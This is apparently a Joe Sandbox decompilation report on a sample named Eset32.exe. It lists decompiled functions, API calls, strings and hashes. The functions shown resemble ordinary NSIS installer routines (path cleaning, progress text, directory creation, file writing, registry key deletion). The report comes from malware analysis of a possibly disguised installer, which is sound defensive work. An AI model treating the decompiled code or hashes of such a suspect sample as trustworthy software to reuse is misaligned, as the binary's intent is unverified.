                                                          • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004063D2(CHAR* _a4) {
                                                          				char _t5;
                                                          				char _t7;
                                                          				char* _t15;
                                                          				char* _t16;
                                                          				CHAR* _t17;
                                                          
                                                          				_t17 = _a4;
                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                          					_t17 =  &(_t17[4]);
                                                          				}
                                                          				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
                                                          					_t17 =  &(_t17[2]);
                                                          				}
                                                          				_t5 =  *_t17;
                                                          				_t15 = _t17;
                                                          				_t16 = _t17;
                                                          				if(_t5 != 0) {
                                                          					do {
                                                          						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
                                                          							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						_t17 = CharNextA(_t17);
                                                          						_t5 =  *_t17;
                                                          					} while (_t5 != 0);
                                                          				}
                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, _t16);
                                                          					_t7 =  *_t16;
                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                          						break;
                                                          					}
                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                          					if(_t15 < _t16) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t7;
                                                          			}


                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • CharPrevA.USER32(?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                          • *?|<>/":, xrefs: 0040641A
                                                          • "C:\Users\user\Desktop\Eset32.exe" , xrefs: 0040640E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\Eset32.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-662819925
                                                          • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                          • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				long _t39;
                                                          				long _t41;
                                                          				void* _t44;
                                                          				signed char _t50;
                                                          				long* _t54;
                                                          
                                                          				if(_a4 + 0xfffffecd > 5) {
                                                          					L18:
                                                          					return 0;
                                                          				}
                                                          				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                          					goto L18;
                                                          				} else {
                                                          					_t50 = _t54[5];
                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                          						goto L18;
                                                          					}
                                                          					_t39 =  *_t54;
                                                          					if((_t50 & 0x00000002) != 0) {
                                                          						_t39 = GetSysColor(_t39);
                                                          					}
                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                          						SetTextColor(_a8, _t39);
                                                          					}
                                                          					SetBkMode(_a8, _t54[4]);
                                                          					_t41 = _t54[1];
                                                          					_v16.lbColor = _t41;
                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                          						_t41 = GetSysColor(_t41);
                                                          						_v16.lbColor = _t41;
                                                          					}
                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                          						SetBkColor(_a8, _t41);
                                                          					}
                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                          						_v16.lbStyle = _t54[2];
                                                          						_t44 = _t54[3];
                                                          						if(_t44 != 0) {
                                                          							DeleteObject(_t44);
                                                          						}
                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                          					}
                                                          					return _t54[3];
                                                          				}
                                                          			}


                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040521E(CHAR* _a4, CHAR* _a8) {
                                                          				struct HWND__* _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v32;
                                                          				long _v44;
                                                          				int _v48;
                                                          				void* _v52;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				CHAR* _t26;
                                                          				signed int _t27;
                                                          				CHAR* _t28;
                                                          				long _t29;
                                                          				signed int _t39;
                                                          
                                                          				_t26 =  *0x42ec04; // 0x0
                                                          				_v8 = _t26;
                                                          				if(_t26 != 0) {
                                                          					_t27 =  *0x42f4f4;
                                                          					_v12 = _t27;
                                                          					_t39 = _t27 & 0x00000001;
                                                          					if(_t39 == 0) {
                                                          						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
                                                          					}
                                                          					_t26 = lstrlenA(0x42a070);
                                                          					_a4 = _t26;
                                                          					if(_a8 == 0) {
                                                          						L6:
                                                          						if((_v12 & 0x00000004) == 0) {
                                                          							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
                                                          						}
                                                          						if((_v12 & 0x00000002) == 0) {
                                                          							_v32 = 0x42a070;
                                                          							_v52 = 1;
                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                          							_v44 = 0;
                                                          							_v48 = _t29 - _t39;
                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                          						}
                                                          						if(_t39 != 0) {
                                                          							_t28 = _a4;
                                                          							 *((char*)(_t28 + 0x42a070)) = 0;
                                                          							return _t28;
                                                          						}
                                                          					} else {
                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                          						if(_t26 < 0x800) {
                                                          							_t26 = lstrcatA(0x42a070, _a8);
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t26;
                                                          			}


                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • SendMessageA.USER32 ref: 004052B2
                                                          • SendMessageA.USER32 ref: 004052CC
                                                          • SendMessageA.USER32 ref: 004052DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                          • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                          • Opcode Fuzzy Hash: 5dba0e3b5696ece34bbdeba82eadf5b4d308cfd28b6f208a66e89dc32a1606df
                                                          • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
                                                          				long _v8;
                                                          				signed char _v12;
                                                          				unsigned int _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				long _v56;
                                                          				void* _v60;
                                                          				long _t15;
                                                          				unsigned int _t19;
                                                          				signed int _t25;
                                                          				struct HWND__* _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                          				if(_a8 == 0) {
                                                          					L4:
                                                          					_v56 = _t15;
                                                          					_v60 = 4;
                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                          					return _v24;
                                                          				}
                                                          				_t19 = GetMessagePos();
                                                          				_v16 = _t19 >> 0x10;
                                                          				_v20 = _t19;
                                                          				ScreenToClient(_t28,  &_v20);
                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                          				if((_v12 & 0x00000066) != 0) {
                                                          					_t15 = _v8;
                                                          					goto L4;
                                                          				}
                                                          				return _t25 | 0xffffffff;
                                                          			}


                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                          				char _v68;
                                                          				int _t11;
                                                          				int _t20;
                                                          
                                                          				if(_a8 == 0x110) {
                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                          					_a8 = 0x113;
                                                          				}
                                                          				if(_a8 == 0x113) {
                                                          					_t20 =  *0x41d440; // 0x3f0998
                                                          					_t11 =  *0x42944c; // 0x3f2b9c
                                                          					if(_t20 >= _t11) {
                                                          						_t20 = _t11;
                                                          					}
                                                          					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                          					SetWindowTextA(_a4,  &_v68);
                                                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                          				}
                                                          				return 0;
                                                          			}


                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                          • MulDiv.KERNEL32(003F0998,00000064,003F2B9C), ref: 00402E00
                                                          • wsprintfA.USER32 ref: 00402E10
                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                          • SetDlgItemTextA.USER32 ref: 00402E32
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                          • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                          • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004056E4(CHAR* _a4) {
                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                          				long _t23;
                                                          
                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                          				_v36.Owner = 0x408384;
                                                          				_v36.Group = 0x408384;
                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                          				_v36.Revision = 1;
                                                          				_v36.Control = 4;
                                                          				_v36.Dacl = 0x408374;
                                                          				_v16.nLength = 0xc;
                                                          				if(CreateDirectoryA(_a4,  &_v16) != 0) {
                                                          					L1:
                                                          					return 0;
                                                          				}
                                                          				_t23 = GetLastError();
                                                          				if(_t23 == 0xb7) {
                                                          					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                          						goto L1;
                                                          					}
                                                          					return GetLastError();
                                                          				}
                                                          				return _t23;
                                                          			}


                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                          Strings
                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                          • API String ID: 3449924974-1521822154
                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E004027DF(void* __ebx) {
                                                          				void* _t26;
                                                          				long _t31;
                                                          				void* _t45;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				void* _t56;
                                                          
                                                          				_t45 = __ebx;
                                                          				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                          				_t50 = E00402BCE(0xfffffff0);
                                                          				 *(_t56 - 0x78) = _t23;
                                                          				if(E00405AFC(_t50) == 0) {
                                                          					E00402BCE(0xffffffed);
                                                          				}
                                                          				E00405C6B(_t50);
                                                          				_t26 = E00405C90(_t50, 0x40000000, 2);
                                                          				 *(_t56 + 8) = _t26;
                                                          				if(_t26 != 0xffffffff) {
                                                          					_t31 =  *0x42f438;
                                                          					 *(_t56 - 0x30) = _t31;
                                                          					_t49 = GlobalAlloc(0x40, _t31);
                                                          					if(_t49 != _t45) {
                                                          						E00403300(_t45);
                                                          						E004032EA(_t49,  *(_t56 - 0x30));
                                                          						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                          						 *(_t56 - 0x38) = _t54;
                                                          						if(_t54 != _t45) {
                                                          							_push( *(_t56 - 0x20));
                                                          							_push(_t54);
                                                          							_push(_t45);
                                                          							_push( *((intOrPtr*)(_t56 - 0x24)));
                                                          							E004030D8();
                                                          							while( *_t54 != _t45) {
                                                          								_t47 =  *_t54;
                                                          								_t55 = _t54 + 8;
                                                          								 *(_t56 - 0x8c) =  *_t54;
                                                          								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                          								_t54 = _t55 +  *(_t56 - 0x8c);
                                                          							}
                                                          							GlobalFree( *(_t56 - 0x38));
                                                          						}
                                                          						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                          						GlobalFree(_t49);
                                                          						_push(_t45);
                                                          						_push(_t45);
                                                          						_push( *(_t56 + 8));
                                                          						_push(0xffffffff);
                                                          						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8();
                                                          					}
                                                          					CloseHandle( *(_t56 + 8));
                                                          				}
                                                          				_t51 = 0xfffffff3;
                                                          				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                          					_t51 = 0xffffffef;
                                                          					DeleteFileA( *(_t56 - 0x78));
                                                          					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                          				}
                                                          				_push(_t51);
                                                          				E00401423();
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
                                                          				return 0;
                                                          			}

                                                          Instruction addresses for E004027DF (the per-line alignment with the C code above was lost in extraction; 0x00000000 would mark an unresolved target):
                                                          0x004027df 0x004027e1 0x004027ed 0x004027f0 0x004027fa 0x004027fe 0x004027fe 0x00402804 0x00402811 0x00402819 0x0040281c 0x00402822 0x00402830 0x00402835 0x00402839 0x0040283c 0x00402845 0x00402851 0x00402855 0x00402858 0x0040285a 0x0040285d 0x0040285e 0x0040285f 0x00402862 0x00402887 0x00402869 0x0040286e 0x00402876 0x0040287c 0x00402881 0x00402881 0x0040288e 0x0040288e 0x0040289b 0x004028a1 0x004028a7 0x004028a8 0x004028a9 0x004028ac 0x004028b3 0x004028b3 0x004028b9 0x004028b9 0x004028c4 0x004028c5 0x004028c9 0x004028cd 0x004028d3 0x004028d3 0x004028da 0x004022dd 0x00402a5d 0x00402a69

                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                          • GlobalFree.KERNEL32 ref: 0040288E
                                                          • GlobalFree.KERNEL32 ref: 004028A1
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                          • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                          • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 48%
                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				char _v276;
                                                          				void* _t27;
                                                          				signed int _t33;
                                                          				intOrPtr* _t35;
                                                          				signed int _t45;
                                                          				signed int _t46;
                                                          				signed int _t47;
                                                          
                                                          				_t46 = _a12;
                                                          				_t47 = _t46 & 0x00000300;
                                                          				_t45 = _t46 & 0x00000001;
                                                          				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                          				if(_t27 == 0) {
                                                          					if((_a12 & 0x00000002) == 0) {
                                                          						L3:
                                                          						_push(0x105);
                                                          						_push( &_v276);
                                                          						_push(0);
                                                          						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                          							__eflags = _t45;
                                                          							if(__eflags != 0) {
                                                          								L10:
                                                          								RegCloseKey(_v8);
                                                          								return 0x3eb;
                                                          							}
                                                          							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								break;
                                                          							}
                                                          							_push(0x105);
                                                          							_push( &_v276);
                                                          							_push(_t45);
                                                          						}
                                                          						RegCloseKey(_v8);
                                                          						_t35 = E00406500(3);
                                                          						if(_t35 != 0) {
                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                          						}
                                                          						return RegDeleteKeyA(_a4, _a8);
                                                          					}
                                                          					_v12 = 0;
                                                          					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                          						goto L10;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          				return _t27;
                                                          			}


                                                          Instruction addresses for E00402CD0 (the per-line alignment with the C code above was lost in extraction; 0x00000000 marks an unresolved target):
                                                          0x00402cdb 0x00402ce4 0x00402ced 0x00402cf9 0x00402d02 0x00402d0c 0x00402d31 0x00402d37 0x00402d3c 0x00402d3d 0x00402d6d 0x00402d46 0x00402d48 0x00402d98 0x00402d9b 0x00000000 0x00402da1 0x00402d57 0x00402d5c 0x00402d5e 0x00000000 0x00000000 0x00402d66 0x00402d6b 0x00402d6c 0x00402d6c 0x00402d79 0x00402d81 0x00402d88 0x00000000 0x00402db1 0x00000000 0x00402d90 0x00402d1c 0x00402d2f 0x00000000 0x00000000 0x00000000 0x00402d2f 0x00402db7

                                                          APIs
                                                          • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
